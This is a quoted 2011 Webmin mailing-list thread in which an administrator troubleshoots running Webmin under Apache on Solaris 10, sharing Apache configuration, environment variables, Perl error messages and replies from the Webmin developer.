> > > > and are intended solely for the use of the individual or entity to whom this
> > > email
> > > > is addressed. If you are not one of the named recipient(s) or otherwise have
> > > reason
> > > > to believe that you have received this message in error, please notify the
> > sender
> > > > and delete this message immediately from your computer. Any other use, retention,
> > > > dissemination, forwarding, printing, or copying of this e-mail is strictly
> > prohibited."
> > > > 
> > > > 
> > > > -----Original Message-----
> > > > From: PEOPLES, MICHAEL P (ATTSI) 
> > > > Sent: Thursday, March 17, 2011 9:10 AM
> > > > To: Webmin development list
> > > > Subject: Re: [webmin-devel] Stumbling Forward RE: Getting Webmin to rununderApache
> > > > for Solaris10-- Creating dent in desk from banging head.
> > > > 
> > > > That did the trick.  You might wish to consider putting that in the documentation
> > > > also.
> > > > 
> > > > Thanks.
> > > > 
> > > > Michael Peoples
> > > > Senior Systems Manager
> > > > AT&T - ATTSI
> > > > Office:            614-789-8559
> > > > Cell:    614-886-0923
> > > > FAX:   614-789-8975
> > > > mpe...@at...
> > > > 
> > > > This e-mail and any files transmitted with it are AT&T property, are confidential,
> > > > and are intended solely for the use of the individual or entity to whom this
> > > email
> > > > is addressed. If you are not one of the named recipient(s) or otherwise have
> > > reason
> > > > to believe that you have received this message in error, please notify the
> > sender
> > > > and delete this message immediately from your computer. Any other use, retention,
> > > > dissemination, forwarding, printing, or copying of this e-mail is strictly
> > prohibited."
> > > > 
> > > > -----Original Message-----
> > > > From: Jamie Cameron [mailto:jca...@we...] 
> > > > Sent: Wednesday, March 16, 2011 7:53 PM
> > > > To: Webmin development list
> > > > Subject: Re: [webmin-devel]Stumbling Forward RE: Getting Webmin to run underApache
> > > > for Solaris10-- Creating dent in desk from banging head.
> > > > 
> > > > Sounds like maybe the PERLLIB environment variable isn't set to the webmin
> > > > root directory (typically /usr/libexec/webmin or /usr/share/webmin). You
> will
> > > > need to set that in your apache config, like WEBMIN_CONFIG is defined.
> > > > 
> > > > On 16/Mar/2011 13:57 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote ..
> > > > > I have the Apache server responding on port 10000.  It even threw up a
> "Windows"
> > > > > login dialog box (versus the standard Webmin login page).But now it's throwing
> > > > > internal server (apache) errors:
> > > > > 
> > > > > Undefined subroutine &WebminCore::init_config called at /dev/fs/4 line
> 7.
> > > > > Premature end of script headers: index.cgi
> > > > > 
> > > > > I can infer that Perl didn't effectively process the "use WebminCore;"
> line
> > > properly,
> > > > > but that may not be the issue.  This message seems very familiar to me
> for
> > > some
> > > > > reason.
> > > > > 
> > > > > Running index.cgi at the command line produces the following error:
> > > > > 
> > > > > # perl -w ./index.cgi
> > > > > Name "WebminCore::STEST" used only once: possible typo at web-lib-funcs.pl
> > > line
> > > > > 1898.
> > > > > Name "main::remote_user" used only once: possible typo at ./index.cgi line
> > > 73.
> > > > > WEBMIN_CONFIG not set at web-lib-funcs.pl line 3943.
> > > > > Use of uninitialized value $callpkg in concatenation (.) or string at web-lib-funcs.pl
> > > > > line 9231.
> > > > > Use of uninitialized value $initial_module_name in string eq at web-lib-funcs.pl
> > > > > line 8200.
> > > > > Use of uninitialized value in string eq at web-lib-funcs.pl line 8200.
> > > > > 
> > > > > I would sort of expect that given that key environment variables are not
> > set.
> > > > > 
> > > > > In both the httpd.conf file and the separate included file containing the
> > Webmin
> > > > > virtual server configuration, I have the four SetEnv statements.
> > > > > 
> > > > > I'm running Perl 5.12.0 and Webmin 1.530
> > > > > 
> > > > > Any thoughts?
> > > > > 
> > > > > Michael Peoples
> > > > > Senior Systems Manager
> > > > > AT&T - ATTSI
> > > > > Office:            614-789-8559
> > > > > Cell:    614-886-0923
> > > > > FAX:   614-789-8975
> > > > > mpe...@at...
> > > > > 
> > > > > This e-mail and any files transmitted with it are AT&T property, are confidential,
> > > > > and are intended solely for the use of the individual or entity to whom
> this
> > > > email
> > > > > is addressed. If you are not one of the named recipient(s) or otherwise
> have
> > > > reason
> > > > > to believe that you have received this message in error, please notify
> the
> > > sender
> > > > > and delete this message immediately from your computer. Any other use,
> retention,
> > > > > dissemination, forwarding, printing, or copying of this e-mail is strictly
> > > prohibited."
> > > > > 
> > > > > 
> > > > > -----Original Message-----
> > > > > From: Jamie Cameron [mailto:jca...@we...] 
> > > > > Sent: Monday, March 14, 2011 8:15 PM
> > > > > To: Webmin development list
> > > > > Subject: Re: [webmin-devel]Getting Webmin to run under Apache for Solaris10--
> > > > Creating
> > > > > dent in desk from banging head.
> > > > > 
> > > > > On 14/Mar/2011 16:57 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote
> ..
> > > > > > Jamie,
> > > > > > 
> > > > > > As always, I very much appreciate your prompt responses and help, as
> I
> > know
> > > > you
> > > > > > have another life creating other great software.
> > > > > > 
> > > > > > If I missed, in the documentation, the need to put that directive in
> the
> > > main
> > > > > (global)
> > > > > > Apache configuration, I apologize.  I really do RTFM before I bother
> busy
> > > people.
> > > > > > If I didn't miss it, perhaps if should be added.  I would be happy to
> make
> > > > updates
> > > > > > to the documents, particularly in areas where I was confused, but I have
> > > no
> > > > access.
> > > > > 
> > > > > Hi Michael,
> > > > > 
> > > > > The docs didn't mention that as most users who run webmin under apache
> do
> > it
> > > > because
> > > > > they want or need to use port 80, which apache is already listening on.
> I
> > will
> > > > > update
> > > > > the docs to mention this.
> > > > > 
> > > > > > Your question is a good one.  I was going to try it merely to see if
> there
> > > > was
> > > > > > an appreciable difference in performance.  What I can tell you within
> the
> > > bounds
> > > > > > of proprietary information is, and you may have guessed some of this
> from
> > > previous
> > > > > > questions, I (we) are using Webmin on a single server in an attempt to
> > provide
> > > > > > a front end for Enterprise management.  
> > > > > > 
> > > > > > We have come a long way and my feeling now is that it was the right decision.
> > > > > > I believe we can leverage existing Webmin code and modules in an "abstracted"
> > > > > manner
> > > > > > where the interface is centrally located on an extremely secure server
> > with
> > > > secure
> > > > > > access to large numbers of servers.  
> > > > > > 
> > > > > > So, I'm not suggesting there were any problems with miniserv.pl.  In
> fact,
> > > > there's
> > > > > > no inherent reason I couldn't use it to throw up any "web" language 
> I
> > choose.
> > > > > > 
> > > > > > Sorry about being a bit fuzzy on the details, but I assure you that I
> will
> > > > make
> > > > > > every effort to publish what I can and still keep my job (the mortgage
> > company
> > > > > > is very fond of that monthly payment).
> > > > > > 
> > > > > > I'll put that directive in and run some comparative tests.
> > > > > 
> > > > > Ok, let us know how the performance tests work out ...
> > > > > 
> > > > >  - Jamie
> > > > > 
> > > > > > Again, thanks for all of the work you've done to help the larger IT community.
> > > > > > 
> > > > > > Michael Peoples
> > > > > > Senior Systems Manager
> > > > > > AT&T - ATTSI
> > > > > > Office:            614-789-8559
> > > > > > Cell:    614-886-0923
> > > > > > FAX:   614-789-8975
> > > > > > mpe...@at...
> > > > > > 
> > > > > > This e-mail and any files transmitted with it are AT&T property, are
> confidential,
> > > > > > and are intended solely for the use of the individual or entity to whom
> > this
> > > > > email
> > > > > > is addressed. If you are not one of the named recipient(s) or otherwise
> > have
> > > > > reason
> > > > > > to believe that you have received this message in error, please notify
> > the
> > > > sender
> > > > > > and delete this message immediately from your computer. Any other use,
> > retention,
> > > > > > dissemination, forwarding, printing, or copying of this e-mail is strictly
> > > > prohibited."
> > > > > > 
> > > > > > 
> > > > > > -----Original Message-----
> > > > > > From: Jamie Cameron [mailto:jca...@we...] 
> > > > > > Sent: Monday, March 14, 2011 4:52 PM
> > > > > > To: Webmin development list
> > > > > > Subject: Re: [webmin-devel]Getting Webmin to run under Apache for Solaris10
> > > > --
> > > > > > Creating dent in desk from banging head.
> > > > > > 
> > > > > > Hi Michael,
> > > > > > 
> > > > > > Did you add the line :
> > > > > > 
> > > > > > Listen 10000
> > > > > > 
> > > > > > to your Apache config? Without this, Apache won't even accept connections
> > > on
> > > > > > port 10000.
> > > > > > 
> > > > > > Regarding the speed of Apache vs miniserv, even though Apache is far
> better
> > > > webserver
> > > > > > in general and written in a faster language (C), miniserv may actually
> > be
> > > more
> > > > > > efficient
> > > > > > for running Webmin as it can execute the perl CGI scripts within the
> same
> > > process,
> > > > > > without needing to launch a perl interpreter for each request as Apache
> > would.
> > > > > > 
> > > > > > Could you tell us more about the kind of app you are running, and the
> performance
> > > > > > issues you are seeing with regular Webmin?
> > > > > > 
> > > > > >  - Jamie
> > > > > > 
> > > > > > On 14/Mar/2011 12:38 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote
> > ..
> > > > > > > Reports are, there are advantages (speed at least) to running it under
> > > Apache.
> > > > > > > 
> > > > > > > I hope I'm not telling you something you already know, I apologize
> if
> > I
> > > am,
> > > > > but
> > > > > > > the miniserv.pl (the Webmin web server) is essentially a looping Perl
> > script.
> > > > > > > Rather clever in my opinion and certainly much lighter than a full
> Apache
> > > > implementation.
> > > > > > > 
> > > > > > > In our particular case, we're doing some unusual things with Webmin,
> > so
> > > I'm
> > > > > trying
> > > > > > > to squeeze every ounce of performance out of it.
> > > > > > > 
> > > > > > > Michael Peoples
> > > > > > > Senior Systems Manager
> > > > > > > AT&T - ATTSI
> > > > > > > Office:            614-789-8559
> > > > > > > Cell:    614-886-0923
> > > > > > > FAX:   614-789-8975
> > > > > > > mpe...@at...
> > > > > > > 
> > > > > > > This e-mail and any files transmitted with it are AT&T property, are
> > confidential,
> > > > > > > and are intended solely for the use of the individual or entity to
> whom
> > > this
> > > > > > email
> > > > > > > is addressed. If you are not one of the named recipient(s) or otherwise
> > > have
> > > > > > reason
> > > > > > > to believe that you have received this message in error, please notify
> > > the
> > > > > sender
> > > > > > > and delete this message immediately from your computer. Any other use,
> > > retention,
> > > > > > > dissemination, forwarding, printing, or copying of this e-mail is strictly
> > > > > prohibited."
> > > > > > > 
> > > > > > > -----Original Message-----
> > > > > > > From: Ron Wheeler [mailto:rwh...@ar...] 
> > > > > > > Sent: Monday, March 14, 2011 2:33 PM
> > > > > > > To: web...@li...
> > > > > > > Subject: Re: [webmin-devel] Getting Webmin to run under Apache for
> Solaris
> > > > > 10
> > > > > > --
> > > > > > > Creating dent in desk from banging head.
> > > > > > > 
> > > > > > > Why not just run it the way it is supposed to run on port 10000?
> > > > > > > 
> > > > > > > Ron
> > > > > > > 
> > > > > > > On 14/03/2011 2:25 PM, PEOPLES, MICHAEL P (ATTSI) wrote:
> > > > > > > > I have spent days trying to get Webmin to run under Apache, but to
> > no
> > > > > > > > avail.  Despite attempting to follow both follow the instructions
> to
> > > the
> > > > > > > > letter, as well as interpret them as best I could, it doesn't work.
> > > I'm
> > > > > > > > sure it works, because Jamie says it does, and Jamie knows what he's
> > > > > > > > talking about.  The problem is me.
> > > > > > > >
> > > > > > > > I am trying to run it as a virtual server on a Solaris 10 box running
> > > > > > > > Apache 2.2.16.  I did the following:
> > > > > > > >
> > > > > > > > Created a virtual server
> > > > > > > >
> > > > > > > > <VirtualHost _default_:10000>
> > > > > > > >
> > > > > > > >      ServerName myserver.att.com:10000
> > > > > > > >
> > > > > > > >      DocumentRoot /opt/webmin
> > > > > > > >
> > > > > > > >      ServerAdmin mp...@at...
> > > > > > > >
> > > > > > > >      ErrorLog "/usr/apache2_2_16/logs/error_log"
> > > > > > > >
> > > > > > > >      TransferLog "/usr/apache2_2_16/logs/access_log"
> > > > > > > >
> > > > > > > >      ScriptAlias /cgi-bin/ "/usr/apache2_2_16/cgi-bin/"
> > > > > > > >
> > > > > > > >      ScriptAlias /script-cgi-bin/ "/usr/apache2_2_16/htdocs/scripts/"
> > > > > > > >
> > > > > > > >      SSLEngine on
> > > > > > > >      SSLCertificateFile "/usr/apache2_2_16/conf/myserver.crt"
> > > > > > > >      SSLCertificateKeyFile "/usr/apache2_2_16/conf/myserver.key"
> > > > > > > >      SSLCACertificateFile "/usr/apache2_2_16/conf/myserver.CA.root.crt"
> > > > > > > >      SSLCACertificateFile
> > > > > > > > "/usr/apache2_2_16/conf/myserver.intermediate.crt"
> > > > > > > >
> > > > > > > >      <FilesMatch "\.(cgi|shtml|phtml|php)$">
> > > > > > > >          SSLOptions +StdEnvVars
> > > > > > > >      </FilesMatch>
> > > > > > > >
> > > > > > > >      <Directory "/usr/apache2_2_16/cgi-bin">
> > > > > > > >          SSLOptions +StdEnvVars
> > > > > > > >      </Directory>
> > > > > > > >
> > > > > > > >      BrowserMatch ".*MSIE.*" nokeepalive ssl-unclean-shutdown
> > > > > > > > downgrade-1.0 force-response-1.0
> > > > > > > >
> > > > > > > >      CustomLog "/usr/apache2_2_16/logs/ssl_request_log"         
> "%t
> > > %h
> > > > > > > > %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> > > > > > > >
> > > > > > > >      <Directory "/opt/webmin">
> > > > > > > >          allow from all
> > > > > > > >          Options +Indexes
> > > > > > > >          AuthName Webmin
> > > > > > > >          AuthType basic
> > > > > > > >          AuthUserFile /etc/webmin/htusers
> > > > > > > >          require valid-user
> > > > > > > >      </Directory>
> > > > > > > >
> > > > > > > > </VirtualHost>
> > > > > > > >
> > > > > > > > Added AddHandler directive to MAIN Apache configuration section
> > > > > > > >
> > > > > > > > AddHandler cgi-script .cgi
> > > > > > > >
> > > > > > > > Added index.cgi directive to MAIN Apache configuration section
> > > > > > > >
> > > > > > > > DirectoryIndex index.html index.cgi
> > > > > > > >
> > > > > > > > Added the following directives to MAIN Apache configuration section
> > > > > > > >
> > > > > > > > 		SetEnv WEBMIN_CONFIG /etc/webmin
> > > > > > > > 		SetEnv WEBMIN_VAR /var/webmin
> > > > > > > > 		SetEnv SERVER_ROOT /opt/webmin
> > > > > > > > 		SetEnv MINISERV_CONFIG /etc/webmin/miniserv.conf
> > > > > > > >
> > > > > > > > Added the following directives to MAIN Apache configuration section
> > > > > > > >
> > > > > > > >      <Directory "/opt/webmin">
> > > > > > > >          allow from all
> > > > > > > >          Options +Indexes
> > > > > > > >          AuthName Webmin
> > > > > > > >          AuthType basic
> > > > > > > >          AuthUserFile /etc/webmin/htusers
> > > > > > > >          require valid-user
> > > > > > > >      </Directory>
> > > > > > > >
> > > > > > > >
> > > > > > > > /etc/webmin/htusers file setup
> > > > > > > >
> > > > > > > > Again, it's not clear what is being requested here.  I created a
> file
> > > > > > > > with each of the users in it, one to a line, like the following:
> > > > > > > >
> > > > > > > > 		root
> > > > > > > > 		user1
> > > > > > > > 		user2
> > > > > > > >
> > > > > > > > I also tried using htpasswd to create a file called /etc/webmin/htusers,
> > > > > > > > but that also did not change things.
> > > > > > > >
> > > > > > > > To be frank, I'm not sure what should be in this file.  Explicit
> > > > > > > > examples would be helpful.
> > > > > > > >
> > > > > > > > Ran the ownership and permission attribute change commands
> > > > > > > >
> > > > > > > > 		chown -R root:root /opt/webmin
> > > > > > > > 		chmod -R 6755 /opt/webmin
> > > > > > > >
> > > > > > > > > From directory /opt/webmin, ran the following command
> > > > > > > >
> > > > > > > > find . -name "*.cgi" -o -name "*.pl" | perl perlpath.pl "/usr/bin/perl
> > > > > > > > -U" -
> > > > > > > >
> > > > > > > > Configure Webmin to use the 'Default Webmin Theme'
> > > > > > > >
> > > > > > > > There's nothing I could do here.  The only theme I have is the "blue"
> > > > > > > > theme.  There is nothing in the Webmin Solaris package that might
> be
> > > > > > > > considered a "default theme".
> > > > > > > >
> > > > > > > > I also tried it putting all (or most) of the above within the virtual
> > > > > > > > host definition:
> > > > > > > >
> > > > > > > > <VirtualHost _default_:10000>
> > > > > > > >
> > > > > > > >      ServerName myserver.att.com:10000
> > > > > > > >
> > > > > > > >      DocumentRoot /opt/webmin
> > > > > > > >
> > > > > > > >      ServerAdmin mp...@at...
> > > > > > > >
> > > > > > > >      ErrorLog "/usr/apache2_2_16/logs/error_log"
> > > > > > > >
> > > > > > > >      TransferLog "/usr/apache2_2_16/logs/access_log"
> > > > > > > >
> > > > > > > >      ScriptAlias /cgi-bin/ "/usr/apache2_2_16/cgi-bin/"
> > > > > > > >
> > > > > > > >      ScriptAlias /script-cgi-bin/ "/usr/apache2_2_16/htdocs/scripts/"
> > > > > > > >
> > > > > > > >      SSLEngine on
> > > > > > > >      SSLCertificateFile "/usr/apache2_2_16/conf/myserver.crt"
> > > > > > > >      SSLCertificateKeyFile "/usr/apache2_2_16/conf/myserver.key"
> > > > > > > >      SSLCACertificateFile "/usr/apache2_2_16/conf/myserver.CA.root.crt"
> > > > > > > >      SSLCACertificateFile
> > > > > > > > "/usr/apache2_2_16/conf/myserver.intermediate.crt"
> > > > > > > >
> > > > > > > >      AddHandler cgi-script .cgi
> > > > > > > >
> > > > > > > >      <FilesMatch "\.(cgi|shtml|phtml|php)$">
> > > > > > > >          SSLOptions +StdEnvVars
> > > > > > > >      </FilesMatch>
> > > > > > > >
> > > > > > > >      <Directory "/usr/apache2_2_16/cgi-bin">
> > > > > > > >          SSLOptions +StdEnvVars
> > > > > > > >      </Directory>
> > > > > > > >
> > > > > > > >      BrowserMatch ".*MSIE.*" nokeepalive ssl-unclean-shutdown
> > > > > > > > downgrade-1.0 force-response-1.0
> > > > > > > >
> > > > > > > >      CustomLog "/usr/apache2_2_16/logs/ssl_request_log"         
> "%t
> > > %h
> > > > > > > > %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> > > > > > > >
> > > > > > > >      <Directory "/opt/webmin">
> > > > > > > >          allow from all
> > > > > > > >          Options +Indexes
> > > > > > > >          AuthName Webmin
> > > > > > > >          AuthType basic
> > > > > > > >          AuthUserFile /etc/webmin/htusers
> > > > > > > >          require valid-user
> > > > > > > >      </Directory>
> > > > > > > >
> > > > > > > >      SetEnv WEBMIN_CONFIG "/etc/webmin"
> > > > > > > >      SetEnv WEBMIN_VAR "/var/webmin"
> > > > > > > >      SetEnv SERVER_ROOT "/opt/webmin"
> > > > > > > >      SetEnv MINISERV_CONFIG "/etc/webmin/miniserv.conf"
> > > > > > > > </VirtualHost>
> > > > > > > >
> > > > > > > > I restarted Apache after each change, but never got the Webmin site
> > or
> > > > > > > > any error messages even referring to it.  Nothing was listening on
> > port
> > > > > > > > 10000.
> > > > > > > >
> > > > > > > > I also tried the "Apache In A Sub-Directory" method, but it didn't
> > work.
> > > > > > > >
> > > > > > > > If I fire up Webmin as I normally would, it works.  I just can't
> get
> > > it
> > > > > > > > to work under Apache.
> > > > > > > >
> > > > > > > > Sorry for the long e-mail, but thanks for any help anyone can offer.
> > > > > > > >
> > > > > > > > Michael Peoples
> > > > > > > > Senior Systems Manager
> > > > > > > > AT&T - ATTSI
> > > > > > > > Office:            614-789-8559
> > > > > > > > Cell:    614-886-0923
> > > > > > > > FAX:   614-789-8975
> > > > > > > > mpe...@at...
> > > > > > > >
> > > > > > > > This e-mail and any files transmitted with it are AT&T property,
> are
> > > > > > > > confidential, and are intended solely for the use of the individual
> > or
> > > > > > > > entity to whom this email is addressed. If you are not one of the
> named
> > > > > > > > recipient(s) or otherwise have reason to believe that you have received
> > > > > > > > this message in error, please notify the sender and delete this message
> > > > > > > > immediately from your computer. Any other use, retention, dissemination,
> > > > > > > > forwarding, printing, or copying of this e-mail is strictly prohibited."
> > > > > > > >
> > > > > > > >
> > > > > > > >
> > > > > > > > ------------------------------------------------------------------------------
> > > > > > > > Colocation vs. Managed Hosting
> > > > > > > > A question and answer guide to determining the best fit
> > > > > > > > for your organization - today and in the future.
> > > > > > > > http://p.sf.net/sfu/internap-sfd2d
> > > > > > > > -
> > > > > > > > Forwarded by the Webmin development list at web...@we...
> > > > > > > > To remove yourself from this list, go to
> > > > > > > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > > > > > >
> > > > > > > 
> > > > > > > 
> > > > > > > ------------------------------------------------------------------------------
> > > > > > > Colocation vs. Managed Hosting
> > > > > > > A question and answer guide to determining the best fit
> > > > > > > for your organization - today and in the future.
> > > > > > > http://p.sf.net/sfu/internap-sfd2d
> > > > > > > -
> > > > > > > Forwarded by the Webmin development list at web...@we...
> > > > > > > To remove yourself from this list, go to
> > > > > > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > > > > > 
> > > > > > > ------------------------------------------------------------------------------
> > > > > > > Colocation vs. Managed Hosting
> > > > > > > A question and answer guide to determining the best fit
> > > > > > > for your organization - today and in the future.
> > > > > > > http://p.sf.net/sfu/internap-sfd2d
> > > > > > > -
> > > > > > > Forwarded by the Webmin development list at web...@we...
> > > > > > > To remove yourself from this list, go to
> > > > > > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > > > > 
> > > > > > ------------------------------------------------------------------------------
> > > > > > Colocation vs. Managed Hosting
> > > > > > A question and answer guide to determining the best fit
> > > > > > for your organization - today and in the future.
> > > > > > http://p.sf.net/sfu/internap-sfd2d
> > > > > > -
> > > > > > Forwarded by the Webmin development list at web...@we...
> > > > > > To remove yourself from this list, go to
> > > > > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > > > 
> > > > > ------------------------------------------------------------------------------
> > > > > Colocation vs. Managed Hosting
> > > > > A question and answer guide to determining the best fit
> > > > > for your organization - today and in the future.
> > > > > http://p.sf.net/sfu/internap-sfd2d
> > > > > -
> > > > > Forwarded by the Webmin development list at web...@we...
> > > > > To remove yourself from this list, go to
> > > > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > > 
> > > > ------------------------------------------------------------------------------
> > > > Colocation vs. Managed Hosting
> > > > A question and answer guide to determining the best fit
> > > > for your organization - today and in the future.
> > > > http://p.sf.net/sfu/internap-sfd2d
> > > > -
> > > > Forwarded by the Webmin development list at web...@we...
> > > > To remove yourself from this list, go to
> > > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > > 
> > > > ------------------------------------------------------------------------------
> > > > Colocation vs. Managed Hosting
> > > > A question and answer guide to determining the best fit
> > > > for your organization - today and in the future.
> > > > http://p.sf.net/sfu/internap-sfd2d
> > > > -
> > > > Forwarded by the Webmin development list at web...@we...
> > > > To remove yourself from this list, go to
> > > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > > 
> > > ------------------------------------------------------------------------------
> > > Colocation vs. Managed Hosting
> > > A question and answer guide to determining the best fit
> > > for your organization - today and in the future.
> > > http://p.sf.net/sfu/internap-sfd2d
> > > -
> > > Forwarded by the Webmin development list at web...@we...
> > > To remove yourself from this list, go to
> > > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> > 
> > ------------------------------------------------------------------------------
> > Colocation vs. Managed Hosting
> > A question and answer guide to determining the best fit
> > for your organization - today and in the future.
> > http://p.sf.net/sfu/internap-sfd2d
> > -
> > Forwarded by the Webmin development list at web...@we...
> > To remove yourself from this list, go to
> > http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> 
> ------------------------------------------------------------------------------
> Colocation vs. Managed Hosting
> A question and answer guide to determining the best fit
> for your organization - today and in the future.
> http://p.sf.net/sfu/internap-sfd2d
> -
> Forwarded by the Webmin development list at web...@we...
> To remove yourself from this list, go to
> http://lists.sourceforge.net/lists/listinfo/webadmin-devel

Re: [webmin-devel] CORRECTION - PROBLEM NOT SOLVEDRE:Stumbling Forward RE: Getting Webmin torununderApacheforSolaris10-- Creating dent in desk from banging head.

[PEOPLES, M. P (ATTSI) <mp...@at...>]

The only way I know how to do this is via the suexec option in Apache.  This version of Apache (2.2.16) was not compiled with that option and attempts to do so have repeatedly failed (for some reason it doesn't like the OpenSSL install despite the fact that it is already using it (--with-ssl).

Running Apache as root is strongly discouraged, so what I'm asking is, do you have a way to do this that doesn't involve recompiling Apache to include suexec or running Apache under root?

If not, I guess I'll have to get this to compile with suexec.

I did notice some suexec related code within Webmin and was hoping that I could use Webmin to configure Apache, stop Webmin, and restart Apache with the new configuration.  I haven't found a reference to mod_suexec_directives in the webmin/apache directory anywhere, so I can't figure out where to access it.  I thought it might be because suexec wasn't compiled into Apache, but that would prevent it being referenced in some module.

Michael Peoples
Senior Systems Manager
AT&T - ATTSI
Office:            614-789-8559
Cell:    614-886-0923
FAX:   614-789-8975
mpe...@at...

This e-mail and any files transmitted with it are AT&T property, are confidential, and are intended solely for the use of the individual or entity to whom this email is addressed. If you are not one of the named recipient(s) or otherwise have reason to believe that you have received this message in error, please notify the sender and delete this message immediately from your computer. Any other use, retention, dissemination, forwarding, printing, or copying of this e-mail is strictly prohibited."

-----Original Message-----
From: Jamie Cameron [mailto:jca...@we...] 
Sent: Friday, March 18, 2011 10:05 PM
To: Webmin development list
Subject: Re: [webmin-devel]CORRECTION - PROBLEM NOT SOLVEDRE:StumblingForward RE: Getting Webmin torununderApacheforSolaris10-- Creating dent in desk frombanging head.

If you run index.cgi from the command line as root, make sure you run it using
the file path, like /opt/webmin/index.cgi .

If it is run by Apache, it needs to be run as root - or else the scripts won't
have permissions do actually do anything.

 - Jamie

On 18/Mar/2011 15:27 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote ..
> (Sorry for the potential duplicate, I flipped the last one to HTML and it got quarantined
> on the mail server).
> 
> Firstly, this feels an awful like when I tried to run modules from the command
> line.  I was on an environment variable and "require" merry-go-round that was frustrating.
> 
> I also want to mention that Apache is running under user 'apache', not 'root',
> if that's relevant.
> 
> ============================================================================================
> 
> I tried executing the index.cgi script as user 'apache' after executing the following:
> 
> PERLLIB="/opt/webmin"; export PERLLIB
> WEBMIN_CONFIG="/etc/webmin" ; export WEBMIN_CONFIG
> WEBMIN_VAR="/var/webmin" ; export WEBMIN_VAR
> SERVER_ROOT="/opt/webmin" ; export SERVER_ROOT
> MINISERV_CONFIG="/etc/webmin/miniserv.conf" ; export MINISERV_CONFIG
> 
> I got the same error: Undefined subroutine &WebminCore::init_config called at /dev/fd/3
> line 7
> 
> ============================================================================================
> 
> I then executed the index.cgi script as user 'root' after executing the following:
> 
> PERLLIB="/opt/webmin"; export PERLLIB
> WEBMIN_CONFIG="/etc/webmin" ; export WEBMIN_CONFIG
> WEBMIN_VAR="/var/webmin" ; export WEBMIN_VAR
> SERVER_ROOT="/opt/webmin" ; export SERVER_ROOT
> MINISERV_CONFIG="/etc/webmin/miniserv.conf" ; export MINISERV_CONFIG
> 
> I got a different error message unrelated to the error above, most likely thrown
> by the web-lib-funcs.pl:
> 
> Error: Script was not run with full path (failed to find ./index.cgi under /opt/webmin)
> JJ
> -----
> Script was not run with full path (failed to find ./index.cgi under /opt/webmin)
> -----
> 
> ============================================================================================
> 
> I shut down miniserv.pl, changed the Apache config, and restarted Apache cleanly.
> Apache was listening on port 10000.
> 
> I pointed my web browser at https://dubsol10.apt.att.com:10000/test.cgi.
> 
> A dialog box popped up asking for my user name and password.  I supplied that an
> the browser displayed the following.  Some data was removed and replaced with a
> <data> placeholder.  If it is relevant to anyone's analysis, I'll try to provide
> it.
> 
> ============================================================================================
> 
> uid=7788(apache) gid=8777(apache) groups=8777(apache),7000(nobody)
> AUTH_TYPE=Basic
> DOCUMENT_ROOT=/opt/webmin
> GATEWAY_INTERFACE=CGI/1.1
> HTTPS=on
> HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7
> HTTP_ACCEPT_ENCODING=gzip,deflate
> HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5
> HTTP_CONNECTION=keep-alive
> HTTP_COOKIE=<data>
> HTTP_HOST=dubsol10.apt.att.com:10000
> HTTP_KEEP_ALIVE=115
> HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203
> Firefox/3.6.13
> MINISERV_CONFIG=/etc/webmin/miniserv.conf
> PATH=/usr/local/bin:/usr/sbin:/usr/bin:/usr/sfw/bin:/usr/local/sbin:/usr/ccs/bin:
> PERL5LIB=
> PERLLIB=/opt/webmin
> QUERY_STRING=
> REMOTE_ADDR=<data>
> REMOTE_PORT=<data>
> REMOTE_USER=root
> REQUEST_METHOD=GET
> REQUEST_URI=/test.cgi
> SCRIPT_FILENAME=/opt/webmin/test.cgi
> SCRIPT_NAME=/test.cgi
> SERVER_ADDR=<data>
> SERVER_ADMIN=mp...@at...
> SERVER_NAME=dubsol10.apt.att.com
> SERVER_PORT=10000
> SERVER_PROTOCOL=HTTP/1.1
> SERVER_ROOT=/opt/webmin
> SERVER_SIGNATURE=
> SERVER_SOFTWARE=Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7d PHP/5.3.3
> SSL_CIPHER=<data>
> SSL_CIPHER_ALGKEYSIZE=<data>
> SSL_CIPHER_EXPORT=false
> SSL_CIPHER_USEKEYSIZE=<data>
> SSL_CLIENT_VERIFY=<data>
> SSL_COMPRESS_METHOD=<data>
> SSL_PROTOCOL=<data>
> SSL_SECURE_RENEG=<data>
> SSL_SERVER_A_KEY=<data>
> SSL_SERVER_A_SIG=<data>
> SSL_SERVER_I_DN=<data>
> SSL_SERVER_I_DN_C=US
> SSL_SERVER_I_DN_CN=VeriSign Class 3 Secure Server CA - G3
> SSL_SERVER_I_DN_O=VeriSign, Inc.
> SSL_SERVER_I_DN_OU=VeriSign Trust Network
> SSL_SERVER_I_DN_OU_1=Terms of use at https://www.verisign.com/rpa (c)10
> SSL_SERVER_M_SERIAL=<data>
> SSL_SERVER_M_VERSION=3
> SSL_SERVER_S_DN=<data>
> SSL_SERVER_S_DN_C=US
> SSL_SERVER_S_DN_CN=dubsol10.apt.att.com
> SSL_SERVER_S_DN_L=<data>
> SSL_SERVER_S_DN_O=<data>
> SSL_SERVER_S_DN_OU=<data>
> SSL_SERVER_S_DN_ST=<data>
> SSL_SERVER_V_END=Feb  1 23:59:59 2012 GMT
> SSL_SERVER_V_START=Feb  1 00:00:00 2011 GMT
> SSL_SESSION_ID=<data>
> SSL_VERSION_INTERFACE=mod_ssl/2.2.16
> SSL_VERSION_LIBRARY=OpenSSL/0.9.7d
> TZ=US/Eastern
> UNIQUE_ID=<data>
